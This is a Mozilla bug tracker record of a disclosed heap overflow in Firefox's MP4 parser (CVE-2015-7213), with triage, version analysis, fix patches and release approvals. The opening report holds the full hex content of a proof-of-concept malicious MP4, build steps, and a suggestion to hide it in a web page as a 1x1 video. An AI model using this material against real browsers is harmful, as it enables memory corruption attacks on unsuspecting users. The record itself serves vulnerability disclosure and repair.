Closed Bug 1206211 (CVE-2015-7213) Opened 9 years ago Closed 9 years ago

Overflow in MPEG4Extractor::readMetaData causes memory-safety bug

Categories

(Core :: Audio/Video: Playback, defect)

Product:
Core
Component:
Audio/Video: Playback
Version:
40 Branch
Type:
defect
Priority:
Not set
Severity:
normal

Tracking

()

Status:
VERIFIED FIXED
Milestone:
mozilla44
Tracking Flags:
Tracking Status
firefox43 + verified
firefox44 + verified
firefox-esr38 43+ verified

People

(Reporter: q1, Assigned: jya)

References

Details

(Keywords: csectype-intoverflow, reporter-external, sec-high, Whiteboard: [adv-main43+][adv-esr38.5+])

Attachments

(8 files)

poc_header.bin
160 bytes, application/octet-stream
Details
poc_trailer.bin
3.39 KB, application/octet-stream
Details
poc_body.bin
96 bytes, application/octet-stream
Details
poc.7z -- unzip with 7z into ready-to-use POC
593.25 KB, application/x-7z-compressed
Details
P1. Ensure operation can't overflow.
1.26 KB, patch
ajones
: review+
lizzard
: approval-mozilla-beta+
abillings
: sec-approval+
Details | Diff | Splinter Review
P2. Abort on OOM.
1.18 KB, patch
ajones
: review+
lizzard
: approval-mozilla-beta+
Details | Diff | Splinter Review
Bug-1206211-P1-Ensure-operation-cant-overflow-rken-ESR38.patch
1.27 KB, patch
mozbugz
: review+
Sylvestre
: approval-mozilla-esr38+
Details | Diff | Splinter Review
Bug-1206211-P2-Abort-on-OOM-rkentuckyfriedtakahe-ESR38.patch
1.20 KB, patch
mozbugz
: review+
Sylvestre
: approval-mozilla-esr38+
Details | Diff | Splinter Review
MPEG4Extractor::readMetaData (media\libstagefright\frameworks\av\media\libstagefright\MPEG4Extractor.cpp) will experience an integer overflow with certain MP4 files. This causes the function to allocate a erroneously-small buffer, which it then overruns. The data causing the overrun comes directly from the MP4 file and is, thus, under an attacker's control. This bug currently is exploitable only on x64 versions of FF, but it might be possible to exploit it on x86 versions as well. Details ------- The bug is in lines 511-514: 511: int psshsize = 0; 512: for (size_t i = 0; i < mPssh.size(); i++) { 513: psshsize += 20 + mPssh[i].datalen; 514: } 515: if (psshsize) { 516: char *buf = (char*)malloc(psshsize); 517: char *ptr = buf; 518: for (size_t i = 0; i < mPssh.size(); i++) { 519: memcpy(ptr, mPssh[i].uuid, 20); // uuid + length 520: memcpy(ptr + 20, mPssh[i].data, mPssh[i].datalen); 521: ptr += (20 + mPssh[i].datalen); 522: } 523: mFileMetaData->setData(kKeyPssh, 'pssh', buf, psshsize); 524: free(buf); 525: } which don't check for overflow of |psshsize|. Thus, a file containing pssh boxes totalling > 4GB cause line 513 to overflow. Line 516 then allocates an erroneously-small buffer, which lines 518-522 then overrun with data extracted directly from the MP4 file. This bug is still present in today's trunk: http://hg.mozilla.org/mozilla-central/file/37c7812ce0e6/media/libstagefright/frameworks/av/media/libstagefright/MPEG4Extractor.cpp . The bug is easy to invoke. Using a binary editor, create poc_header.bin with the following data: 000: 00 00 00 1c 66 74 79 70 6d 70 34 32 00 00 00 00 010: 6d 70 34 32 69 73 6f 6d 61 76 63 31 00 00 00 84 020: 66 72 65 65 00 00 00 00 00 00 00 00 00 00 00 00 030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Then create poc_trailer.bin with this data: 000: 00 00 0d 83 6d 6f 6f 76 00 00 00 6c 6d 76 68 64 moov lmvhd 010: 00 00 00 00 c7 ca ee a7 c7 ca ee a8 00 01 5f 90 _ 020: 00 07 a5 80 00 01 00 00 01 00 00 00 00 00 00 00 030: 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 040: 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 050: 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 @ 060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 070: 00 00 00 03 00 00 00 18 69 6f 64 73 00 00 00 00 iods 080: 10 80 80 80 07 00 4f ff ff 0f 7f ff 00 00 06 0a O 090: 74 72 61 6b 00 00 00 5c 74 6b 68 64 00 00 00 01 trak \tkhd 0a0: c7 ca ee a7 c7 ca ee a8 00 00 00 01 00 00 00 00 0b0: 00 07 99 50 00 00 00 00 00 00 00 00 00 00 00 00 P 0c0: 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 0d0: 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 0e0: 00 00 00 00 40 00 00 00 02 30 00 00 01 40 00 00 @ 0 @ 0f0: 00 00 05 a6 6d 64 69 61 00 00 00 20 6d 64 68 64 mdia mdhd 100: 00 00 00 00 c7 ca ee a7 c7 ca ee a8 00 01 5f 90 _ 110: 00 07 99 50 55 c4 00 00 00 00 00 21 68 64 6c 72 PU !hdlr 120: 00 00 00 00 00 00 00 00 76 69 64 65 00 00 00 00 vide 130: 00 00 00 00 00 00 00 00 00 00 00 05 5d 6d 69 6e ]min 140: 66 00 00 00 14 76 6d 68 64 00 00 00 01 00 00 00 f vmhd 150: 00 00 00 00 00 00 00 00 24 64 69 6e 66 00 00 00 $dinf 160: 1c 64 72 65 66 00 00 00 00 00 00 00 01 00 00 00 dref 170: 0c 75 72 6c 20 00 00 00 01 00 00 05 1d 73 74 62 url stb 180: 6c 00 00 00 ab 73 74 73 64 00 00 00 00 00 00 00 l stsd 190: 01 00 00 00 9b 61 76 63 31 00 00 00 00 00 00 00 avc1 1a0: 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b0: 00 02 30 01 40 00 48 00 00 00 48 00 00 00 00 00 0 @ H H 1c0: 00 00 01 0e 4a 56 54 2f 41 56 43 20 43 6f 64 69 JVT/AVC Codi 1d0: 6e 67 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ng 1e0: 00 00 00 00 18 ff ff 00 00 00 33 61 76 63 43 01 3avcC 1f0: 42 c0 1e ff e1 00 1b 67 42 c0 1e 9e 21 81 18 53 B gB ! S 200: 4d 40 40 40 50 00 00 03 00 10 00 00 03 03 c8 f1 M@@@P 210: 62 ee 01 00 05 68 ce 06 cb 20 00 00 00 12 63 6f b h co 220: 6c 72 6e 63 6c 63 00 01 00 01 00 01 00 00 00 18 lrnclc 230: 73 74 74 73 00 00 00 00 00 00 00 01 00 00 00 a6 stts 240: 00 00 0b b8 00 00 02 ac 73 74 73 7a 00 00 00 00 stsz 250: 00 00 00 00 00 00 00 a6 00 00 56 27 00 00 0b 20 V' 260: 00 00 05 bc 00 00 05 e2 00 00 05 c1 00 00 04 37 7 270: 00 00 04 07 00 00 03 b6 00 00 06 45 00 00 03 73 E s 280: 00 00 05 12 00 00 03 26 00 00 02 e9 00 00 03 7b & { 290: 00 00 03 4a 00 00 03 6b 00 00 02 b6 00 00 03 4c J k L 2a0: 00 00 02 7a 00 00 02 c7 00 00 02 2e 00 00 03 16 z . 2b0: 00 00 02 26 00 00 02 7f 00 00 01 ec 00 00 01 ea & 2c0: 00 00 01 f5 00 00 01 eb 00 00 01 fa 00 00 01 e7 2d0: 00 00 01 fc 00 00 01 dd 00 00 01 c6 00 00 01 ae 2e0: 00 00 01 c8 00 00 01 b9 00 00 01 90 00 00 01 93 2f0: 00 00 01 8c 00 00 01 da 00 00 01 c2 00 00 05 d0 300: 00 00 07 b8 00 00 06 7a 00 00 09 a9 00 00 0a 2c z , 310: 00 00 0a 7c 00 00 0c b3 00 00 09 8c 00 00 09 52 | R 320: 00 00 0c 04 00 00 0d c1 00 00 0f 74 00 00 10 48 t H 330: 00 00 11 06 00 00 10 61 00 00 0c 63 00 00 0c 31 a c 1 340: 00 00 0b 42 00 00 0c 0d 00 00 0f 32 00 00 0a 7b B 2 { 350: 00 00 0d 0f 00 00 0a e0 00 00 0a 0e 00 00 0b 6b k 360: 00 00 08 74 00 00 0c 36 00 00 09 e6 00 00 06 8d t 6 370: 00 00 04 f8 00 00 07 8a 00 00 07 c1 00 00 09 f3 380: 00 00 07 c7 00 00 0a cb 00 00 0a d2 00 00 0b 74 t 390: 00 00 0c 28 00 00 0a 9a 00 00 0c 60 00 00 0d 6d ( ` m 3a0: 00 00 0c 3e 00 00 0f fc 00 00 0e 82 00 00 0b 79 > y 3b0: 00 00 0d e4 00 00 0d 24 00 00 0a 17 00 00 11 aa $ 3c0: 00 00 12 65 00 00 0d 7b 00 00 12 a0 00 00 13 d8 e { 3d0: 00 00 11 49 00 00 0e 59 00 00 10 15 00 00 16 81 I Y 3e0: 00 00 09 b4 00 00 06 eb 00 00 05 ef 00 00 05 8a 3f0: 00 00 03 d7 00 00 04 0d 00 00 03 bb 00 00 04 6b k 400: 00 00 03 40 00 00 03 30 00 00 02 de 00 00 03 ae @ 0 410: 00 00 05 cf 00 00 04 6c 00 00 05 69 00 00 05 00 l i 420: 00 00 06 a1 00 00 03 35 00 00 04 1a 00 00 03 fa 5 430: 00 00 06 3d 00 00 05 d6 00 00 04 68 00 00 02 d6 = h 440: 00 00 04 b5 00 00 02 d9 00 00 02 7f 00 00 02 4d M 450: 00 00 02 7d 00 00 03 8c 00 00 02 06 00 00 02 01 } 460: 00 00 07 7f 00 00 05 ef 00 00 05 b8 00 00 04 0a 470: 00 00 02 99 00 00 03 1d 00 00 07 c5 00 00 05 ac 480: 00 00 04 78 00 00 08 71 00 00 08 99 00 00 08 e9 x q 490: 00 00 08 99 00 00 05 73 00 00 07 c7 00 00 08 3d s = 4a0: 00 00 0b 59 00 00 0a 36 00 00 06 ba 00 00 05 f9 Y 6 4b0: 00 00 07 2e 00 00 06 eb 00 00 04 c6 00 00 04 ba . 4c0: 00 00 05 66 00 00 04 31 00 00 06 8a 00 00 06 cf f 1 4d0: 00 00 06 fe 00 00 04 97 00 00 02 43 00 00 03 e2 C 4e0: 00 00 04 06 00 00 02 e6 00 00 02 6b 00 00 02 75 k u 4f0: 00 00 00 28 73 74 73 63 00 00 00 00 00 00 00 02 (stsc 500: 00 00 00 01 00 00 00 04 00 00 00 01 00 00 00 2a * 510: 00 00 00 02 00 00 00 01 00 00 00 b8 73 74 63 6f stco 520: 00 00 00 00 00 00 00 2a 00 00 00 a8 00 00 73 e6 * s 530: 00 00 8b f4 00 00 a4 08 00 00 b7 64 00 00 c8 a5 d 540: 00 00 d7 d8 00 00 e4 a5 00 00 ec 5f 00 00 f8 5f _ _ 550: 00 01 04 41 00 01 1f c3 00 01 51 85 00 01 84 7e A Q ~ 560: 00 01 cc a6 00 02 03 c0 00 02 3c 52 00 02 66 75 <R fu 570: 00 02 8a 1c 00 02 b4 a6 00 02 e7 66 00 03 23 01 f # 580: 00 03 5d ac 00 03 9e 97 00 03 ea 64 00 04 26 0a ] d & 590: 00 04 3e 69 00 04 4c ff 00 04 63 d9 00 04 7e 43 >i L c ~C 5a0: 00 04 98 9b 00 04 ad a9 00 04 be f7 00 04 d7 94 5b0: 00 04 ed 6c 00 05 0e 3b 00 05 2d c9 00 05 59 f0 l ; - Y 5c0: 00 05 7b 82 00 05 95 2b 00 05 b3 da 00 05 c6 67 { + g 5d0: 00 00 00 14 73 74 73 73 00 00 00 00 00 00 00 01 stss 5e0: 00 00 00 01 00 00 00 b2 73 64 74 70 00 00 00 00 sdtp 5f0: 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDD 600: 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 610: 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 620: 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 630: 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 640: 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 650: 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 660: 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 670: 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 680: 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 690: 44 44 44 44 44 44 00 00 06 7e 74 72 61 6b 00 00 DDDDDD ~trak 6a0: 00 5c 74 6b 68 64 00 00 00 03 c7 ca ee a7 c7 ca \tkhd 6b0: ee a8 00 00 00 02 00 00 00 00 00 07 a5 80 00 00 6c0: 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 01 6d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 6e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 @ 6f0: 00 00 00 00 00 00 00 00 00 00 00 00 06 04 6d 64 md 700: 69 61 00 00 00 20 6d 64 68 64 00 00 00 00 c7 ca ia mdhd 710: ee a7 c7 ca ee a8 00 00 bb 80 00 04 14 00 15 c7 720: 00 00 00 00 00 21 68 64 6c 72 00 00 00 00 00 00 !hdlr 730: 00 00 73 6f 75 6e 00 00 00 00 00 00 00 00 00 00 soun 740: 00 00 00 00 00 05 bb 6d 69 6e 66 00 00 00 10 73 minf s 750: 6d 68 64 00 00 00 00 00 00 00 00 00 00 00 24 64 mhd $d 760: 69 6e 66 00 00 00 1c 64 72 65 66 00 00 00 00 00 inf dref 770: 00 00 01 00 00 00 0c 75 72 6c 20 00 00 00 01 00 url 780: 00 05 7f 73 74 62 6c 00 00 00 67 73 74 73 64 00 stbl gstsd 790: 00 00 00 00 00 00 01 00 00 00 57 6d 70 34 61 00 Wmp4a 7a0: 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 7b0: 01 00 10 00 00 00 00 bb 80 00 00 00 00 00 33 65 3e 7c0: 73 64 73 00 00 00 00 03 80 80 80 22 00 00 00 04 sds " 7d0: 80 80 80 14 40 15 00 01 18 00 01 65 f0 00 01 44 @ e D 7e0: 6b 05 80 80 80 02 11 88 06 80 80 80 01 02 00 00 k 7f0: 00 18 73 74 74 73 00 00 00 00 00 00 00 01 00 00 stts 800: 01 05 00 00 04 00 00 00 04 28 73 74 73 7a 00 00 (stsz 810: 00 00 00 00 00 00 00 00 01 05 00 00 00 f7 00 00 820: 00 db 00 00 00 e1 00 00 00 e5 00 00 00 e9 00 00 830: 00 e8 00 00 00 f0 00 00 00 f1 00 00 00 ef 00 00 840: 00 d8 00 00 00 e6 00 00 00 e7 00 00 00 e9 00 00 850: 00 eb 00 00 00 ea 00 00 00 e8 00 00 00 e1 00 00 860: 00 e7 00 00 00 d7 00 00 00 da 00 00 00 d9 00 00 870: 00 db 00 00 00 e9 00 00 00 ee 00 00 00 e5 00 00 880: 00 e1 00 00 00 e6 00 00 00 e5 00 00 00 d8 00 00 890: 00 dd 00 00 00 dd 00 00 00 d5 00 00 00 ea 00 00 8a0: 00 dd 00 00 00 d0 00 00 00 d6 00 00 00 e9 00 00 8b0: 00 bc 00 00 00 ab 00 00 00 b3 00 00 00 b5 00 00 8c0: 00 bc 00 00 00 ce 00 00 00 b4 00 00 00 b6 00 00 8d0: 00 b3 00 00 00 b6 00 00 00 b7 00 00 00 bf 00 00 8e0: 00 b7 00 00 00 cd 00 00 00 c1 00 00 00 ba 00 00 8f0: 00 a7 00 00 00 b4 00 00 00 b1 00 00 00 be 00 00 900: 00 d0 00 00 00 ba 00 00 00 bc 00 00 00 c4 00 00 910: 00 c6 00 00 00 cb 00 00 00 c4 00 00 00 c3 00 00 920: 00 c8 00 00 00 d2 00 00 00 d2 00 00 00 d6 00 00 930: 00 f5 00 00 00 fa 00 00 00 f6 00 00 01 02 00 00 940: 00 fc 00 00 00 fc 00 00 00 ee 00 00 00 e6 00 00 950: 00 ea 00 00 00 ea 00 00 00 e8 00 00 00 de 00 00 960: 00 df 00 00 00 e7 00 00 00 f6 00 00 00 ff 00 00 970: 01 03 00 00 00 f6 00 00 01 08 00 00 01 03 00 00 980: 00 fd 00 00 01 05 00 00 01 02 00 00 01 00 00 00 990: 01 14 00 00 01 18 00 00 00 fd 00 00 00 fb 00 00 9a0: 01 11 00 00 01 05 00 00 01 05 00 00 01 0a 00 00 9b0: 01 01 00 00 00 f3 00 00 00 f7 00 00 00 f7 00 00 9c0: 01 01 00 00 01 02 00 00 00 f8 00 00 00 f8 00 00 9d0: 00 ef 00 00 00 ed 00 00 00 e3 00 00 00 ec 00 00 9e0: 00 e2 00 00 00 e8 00 00 00 dc 00 00 00 e0 00 00 9f0: 00 f3 00 00 00 df 00 00 00 e1 00 00 00 cf 00 00 a00: 00 ce 00 00 00 d8 00 00 00 ce 00 00 00 c7 00 00 a10: 00 cd 00 00 00 b7 00 00 00 af 00 00 00 c8 00 00 a20: 00 d7 00 00 00 e5 00 00 00 e4 00 00 00 c6 00 00 a30: 00 d1 00 00 00 d5 00 00 00 e5 00 00 00 d8 00 00 a40: 00 c8 00 00 00 be 00 00 00 bf 00 00 00 cb 00 00 a50: 00 d2 00 00 00 c8 00 00 00 ca 00 00 00 b1 00 00 a60: 00 a3 00 00 00 c7 00 00 00 dc 00 00 00 d9 00 00 a70: 00 dd 00 00 00 d1 00 00 00 d2 00 00 00 c2 00 00 a80: 00 bc 00 00 00 b1 00 00 00 9b 00 00 00 89 00 00 a90: 00 a2 00 00 00 9f 00 00 00 b5 00 00 00 a6 00 00 aa0: 00 b2 00 00 00 b5 00 00 00 ae 00 00 00 b4 00 00 ab0: 00 b0 00 00 00 c6 00 00 00 c3 00 00 00 d5 00 00 ac0: 00 e4 00 00 00 f6 00 00 00 d6 00 00 00 db 00 00 ad0: 00 cc 00 00 00 e7 00 00 00 f9 00 00 00 cb 00 00 ae0: 00 d8 00 00 00 d6 00 00 00 e4 00 00 00 f1 00 00 af0: 00 e4 00 00 00 e6 00 00 00 df 00 00 00 ee 00 00 b00: 00 d7 00 00 00 c7 00 00 00 e7 00 00 00 f9 00 00 b10: 00 ed 00 00 00 cf 00 00 00 f1 00 00 00 e6 00 00 b20: 00 dc 00 00 00 e4 00 00 00 ef 00 00 00 e5 00 00 b30: 00 f1 00 00 00 e3 00 00 00 ec 00 00 00 ec 00 00 b40: 00 f3 00 00 00 f5 00 00 00 fd 00 00 01 0b 00 00 b50: 01 10 00 00 01 11 00 00 01 03 00 00 01 01 00 00 b60: 00 fb 00 00 00 fa 00 00 00 e7 00 00 00 e5 00 00 b70: 00 f0 00 00 00 d2 00 00 00 e5 00 00 00 f3 00 00 b80: 00 f1 00 00 00 f2 00 00 00 ff 00 00 00 f7 00 00 b90: 00 ee 00 00 00 d5 00 00 00 d9 00 00 00 ea 00 00 ba0: 00 e3 00 00 00 df 00 00 00 f7 00 00 00 ff 00 00 bb0: 00 f8 00 00 00 fa 00 00 00 fd 00 00 00 f7 00 00 bc0: 00 f9 00 00 00 fb 00 00 00 f8 00 00 00 f6 00 00 bd0: 00 f0 00 00 00 fe 00 00 01 02 00 00 00 e9 00 00 be0: 00 ec 00 00 00 ec 00 00 00 e7 00 00 00 ea 00 00 bf0: 00 de 00 00 00 e2 00 00 00 c9 00 00 00 d4 00 00 c00: 00 d4 00 00 00 c7 00 00 00 c9 00 00 00 c8 00 00 c10: 00 c1 00 00 00 c0 00 00 00 bd 00 00 00 de 00 00 c20: 00 cb 00 00 00 cd 00 00 00 d4 00 00 00 6d 00 00 m c30: 00 28 73 74 73 63 00 00 00 00 00 00 00 02 00 00 (stsc c40: 00 01 00 00 00 07 00 00 00 01 00 00 00 26 00 00 & c50: 00 02 00 00 00 01 00 00 00 a8 73 74 63 6f 00 00 stco c60: 00 00 00 00 00 26 00 00 6d 8d 00 00 85 9b 00 00 & m c70: 9d e4 00 00 b1 21 00 00 c2 a7 00 00 d2 8e 00 00 ! c80: df 8e 00 00 f3 54 00 00 fe e8 00 01 1a 05 00 01 T c90: 4a c7 00 01 7e 28 00 01 c5 a1 00 01 fc 89 00 02 J ~( ca0: 35 5c 00 02 83 6a 00 02 ae 62 00 02 e1 ae 00 03 5\ j b cb0: 1d 6d 00 03 58 04 00 03 99 4d 00 03 e4 b1 00 04 m X M cc0: 21 99 00 04 39 67 00 04 5d c6 00 04 78 18 00 04 ! 9g ] x cd0: 92 6a 00 04 a7 67 00 04 b8 7e 00 04 d0 6c 00 04 j g ~ l ce0: e7 0c 00 05 07 c6 00 05 53 5c 00 05 74 bc 00 05 S\ t cf0: 8e 99 00 05 ae 19 00 05 c0 eb 00 05 cb 47 00 00 G d00: 00 16 75 64 74 61 00 00 00 0e 6e 61 6d 65 53 74 udta nameSt d10: 65 72 65 6f 00 00 00 6f 75 64 74 61 00 00 00 67 ereo oudta g d20: 6d 65 74 61 00 00 00 00 00 00 00 21 68 64 6c 72 meta !hdlr d30: 00 00 00 00 00 00 00 00 6d 64 69 72 00 00 00 00 mdir d40: 00 00 00 00 00 00 00 00 00 00 00 00 3a 69 6c 73 :ils d50: 74 00 00 00 32 a9 74 6f 6f 00 00 00 2a 64 61 74 t 2 too *dat d60: 61 00 00 00 01 00 00 00 00 62 6c 61 68 62 6c 61 a blahbla d70: 68 62 20 30 2e 39 2e 34 20 32 32 32 32 31 31 32 hb 0.9.4 2222112 d80: 33 30 30 00 00 00 08 66 72 65 65 Then create poc_body.bin with these contents: 000: 01 00 00 00 70 73 73 68 00 00 00 04 ee ee ee ee pssh 010: ee ee ee ee ee ee ee ee ee ee ee ee 00 00 00 00 020: 50 75 74 20 79 6f 75 72 20 61 74 74 61 63 6b 20 Put your attack 030: 63 6f 64 65 20 61 6e 64 20 64 61 74 61 20 68 65 code and data he 040: 72 65 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e re.............. 050: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d ---------------- Set the length of poc_body.bin to 0x01000000. It doesn't matter what bytes 0x20-0xffffff contain. Next, repeatedly double poc_body.bin until it's exactly 0x100000000 bytes long (4GB). Then copy poc_header.bin+poc_body.bin+poc_trailer.bin into poc_test.mp4 , Start FF Win64 and attach a debugger, setting a BP on line 511. Load poc_test.mp4 and wait for the BP to fire, then step the code to see the overflow and subsequent overrun.
The file takes ~30 sec to load. It could be embedded into an attack page as a 1x1 pixel video so users wouldn't notice it loading.
Flags: needinfo?(jyavenard)
Could you please attach the test file to make it easier to confirm? Thanks.
Flags: needinfo?(q1)
(In reply to Andrew McCreight [:mccr8] from comment #2) > Could you please attach the test file to make it easier to confirm? Thanks. OK. You'll need to edit the poc_body.bin file, extend it, and so forth as described at the end of comment 0. Otherwise it'd be too large to upload. I'll upload the binary files momentarily.
Flags: needinfo?(q1)
Attached file poc_header.bin —
Attached file poc_trailer.bin —
Attached file poc_body.bin —
Attachment #8664340 - Attachment filename: poc_lsf_trailer_1.bin → poc_trailer.bin
Attachment #8664336 - Attachment filename: poc_lsf_hdr_1.bin → poc_header.bin
Attachment #8664342 - Attachment filename: poc_lsf_pssh_2.bin → poc_body.bin
OK. Enjoy!
(In reply to q1 from comment #3) > (In reply to Andrew McCreight [:mccr8] from comment #2) > > Could you please attach the test file to make it easier to confirm? Thanks. > > OK. You'll need to edit the poc_body.bin file, extend it, and so forth as > described at the end of comment 0. Otherwise it'd be too large to upload. > I'll upload the binary files momentarily. The described test case should compress very well with say xz or lzma if that body is just the same repeated byte. Can you please attach a ready to run test that has been compressed? Thanks.
Depends on: 1207312
(In reply to q1 from comment #9) > Created attachment 8664449 [details] > poc.7z -- unzip with 7z into ready-to-use POC Thanks! I tried to reproduce the issue but hit another I came across while fuzzing a couple weeks ago. I have log the other issue. In the mean time any back traces or ASan logs that you managed to capture would also be nice to have.
(In reply to Tyson Smith [:tsmith] from comment #10) > (In reply to q1 from comment #9) > > Created attachment 8664449 [details] > > poc.7z -- unzip with 7z into ready-to-use POC > > Thanks! I tried to reproduce the issue but hit another I came across while > fuzzing a couple weeks ago. I have log the other issue. In the mean time any > back traces or ASan logs that you managed to capture would also be nice to > have. I found this via code inspection, then formulated the POC. I have tested it under FF 40.0 debug Win64, which is my build with a few trivial unrelated mods. It also crashes 40.0b8 Win64 downloaded directly from ftp.mozilla.org, and if you examine it in the debugger, the crash was clearly caused by memory getting overwritten with the POC's test pattern.
Flags: sec-bounty?
Flags: needinfo?(jyavenard)
git bz lost my comment will provide it again later.
Attachment #8665247 - Flags: review?(ajones)
Attached patch P2. Abort on OOM. — — Splinter Review
Attachment #8665248 - Flags: review?(ajones)
So what I was saying (though will do in a shorter version) While I could see how we could think it would happen theoretically, it can no longer happen following bug 1196398 (which is in 41 onward). We only ever parse the ftyp and moov atoms ; anything in between is ignored. And as such, with this POC.mp4 you'll find that mPssh is an empty array. We no longer support encrypted MP4 outside fragmented mp4 and MSE ; as such we don't attempt to parse pssh atoms ; we use the MoofParser for this which doesn't have this vulnerability. Now you could attempt to craft a mp4 where those pssh would be within the moov atom; but for this to work, you would need the moov atom to have a size > 2GB which isn't possible and would cause a decoding error. We could make the moov atom the last atom and make it with a size of 0 (which normally means: read to the end). However, stagefright doesn't support those and will return also an error as it will error if the atom size is below 8. As such, this vulnerability doesn't apply in 41 and later.
Attachment #8665247 - Flags: review?(ajones) → review+
Attachment #8665248 - Flags: review?(ajones) → review+
Comment on attachment 8665247 [details] [diff] [review] P1. Ensure operation can't overflow. [Security approval request comment] How easily could an exploit be constructed based on the patch? I don't believe they can in 41 and later with this POC. Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem? it's fairly generic; do mention Which older supported branches are affected by this flaw? 40 and earlier. esr38 is affected. If not all supported branches, which bug introduced the flaw? the stagefright one, over 1.5 years ago. Do you have backports for the affected branches? If not, how different, hard to create, and risky will they be? Patch should apply on 38. How likely is this patch to cause regressions; how much testing does it need? none ; we've applied the same logic elsewhere (limiting size to 2GiB)
Attachment #8665247 - Flags: sec-approval?
Assignee: nobody → jyavenard
!@#$@#$!~@#$ I pushed another patch in my queue, not realising that this one was in it, and it got pushed :( https://hg.mozilla.org/integration/mozilla-inbound/rev/708cf76b6cb4 https://hg.mozilla.org/integration/mozilla-inbound/rev/680e1f669ea5 :(
(In reply to Jean-Yves Avenard [:jya] from comment #16) > !@#$@#$!~@#$ I pushed another patch in my queue, not realising that this one > was in it, and it got pushed :( > > https://hg.mozilla.org/integration/mozilla-inbound/rev/708cf76b6cb4 > https://hg.mozilla.org/integration/mozilla-inbound/rev/680e1f669ea5 > > :( per talking to dveditz on irc we let this check-in stay and not so far backing this out
(In reply to Jean-Yves Avenard [:jya] from comment #14) > So what I was saying (though will do in a shorter version) > > While I could see how we could think it would happen theoretically, it can > no longer happen following bug 1196398 (which is in 41 onward). > We only ever parse the ftyp and moov atoms ; anything in between is ignored. > And as such, with this POC.mp4 you'll find that mPssh is an empty array. > > We no longer support encrypted MP4 outside fragmented mp4 and MSE ; as such > we don't attempt to parse pssh atoms ; we use the MoofParser for this which > doesn't have this vulnerability. > > Now you could attempt to craft a mp4 where those pssh would be within the > moov atom; but for this to work, you would need the moov atom to have a size > > 2GB which isn't possible and would cause a decoding error. > > We could make the moov atom the last atom and make it with a size of 0 > (which normally means: read to the end). However, stagefright doesn't > support those and will return also an error as it will error if the atom > size is below 8. > > As such, this vulnerability doesn't apply in 41 and later. That's the conclusion I came to after trying the POC on 41 yesterday.
We need a security rating on this issue. This looks like an exploitable crash from an overflow. Is that right? Am I correct in reading that we are *only* wanting this bug on ESR38, despite screw ups of checkins? :-)
Flags: needinfo?(jyavenard)
Group: core-security → media-core-security
(In reply to Al Billings [:abillings] from comment #19) > We need a security rating on this issue. This looks like an exploitable > crash from an overflow. Is that right? Hard to tell really. Just as severe as all the other stagefright overflow. Probably more so because it's very easily to control what is going to be copied as the code simply replicate the content of the mp4 atoms. > > Am I correct in reading that we are *only* wanting this bug on ESR38, > despite screw ups of checkins? :-) Yes, only for ESR38
Flags: needinfo?(jyavenard)
Flags: sec-bounty? → sec-bounty+
Keywords: sec-high
Comment on attachment 8665247 [details] [diff] [review] P1. Ensure operation can't overflow. sec-approval+. Can you nominate for ESR38?
Attachment #8665247 - Flags: sec-approval? → sec-approval+
Group: media-core-security → core-security-release
Since libstagefright is a Google lib (I think!), I have reported this bug also at https://code.google.com/p/chromium/issues/detail?id=539372 .
This was supposed to have landed in the ESR release, let's not miss this one too.
status-firefox-esr38: --- → affected
tracking-firefox-esr38: --- → 43+
ni? just to make sure releng is tracking this bug
Flags: needinfo?(rkothari)
As this bug is needed before bug 1216748, I've checked the patches for landing on Beta-43 (the original patches just work) and ESR-38 (new patches submitted above). Note that they are already in Aurora-44, so no need to uplift them there.
Blocks: CVE-2015-7222
Gerald, could you please nominate the ESR38 patch for uplift?
Flags: needinfo?(rkothari) → needinfo?(gsquelart)
Comment on attachment 8694544 [details] [diff] [review] Bug-1206211-P1-Ensure-operation-cant-overflow-rken-ESR38.patch [Approval Request Comment] If this is not a sec:{high,crit} bug, please state case for ESR consideration: It is sec-high. User impact if declined: Potential OOMs, crashes with bad MP4 files. Fix Landed on Version: 44 Risk to taking this patch (and alternatives if risky): Very little, it's only added checks with parsing bailouts. String or UUID changes made by this patch: None.
Attachment #8694544 - Flags: approval-mozilla-esr38?
